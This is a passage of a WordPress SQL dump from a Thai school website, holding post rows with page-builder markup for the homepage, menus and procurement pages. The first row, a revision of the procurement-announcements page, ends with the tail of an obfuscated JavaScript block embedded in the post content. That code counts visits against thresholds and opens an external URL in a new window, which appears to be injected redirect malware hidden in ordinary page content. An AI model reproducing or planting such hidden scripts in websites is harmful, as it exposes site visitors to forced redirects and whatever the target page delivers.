_0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ','','inherit','closed','closed','','1059-revision-v1','','','2024-08-23 14:33:14','2024-08-23 07:33:14','',1059,'http://pakhaeng.ssk.in.th/?p=1063',0,'revision','',0),
(1064,1,'2024-08-23 14:33:50','2024-08-23 07:33:50','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":758,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-2.png\" alt=\"\" class=\"wp-image-758\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=780\" data-type=\"page\" data-id=\"780\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=824\">แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\" data-type=\"page\" data-id=\"784\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=840\" data-type=\"page\" data-id=\"840\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1059\" data-type=\"page\" data-id=\"1059\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=851\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=855\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\">รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=716\" data-type=\"page\" data-id=\"716\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"900\">การขับเคลื่อนจริยธรรม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 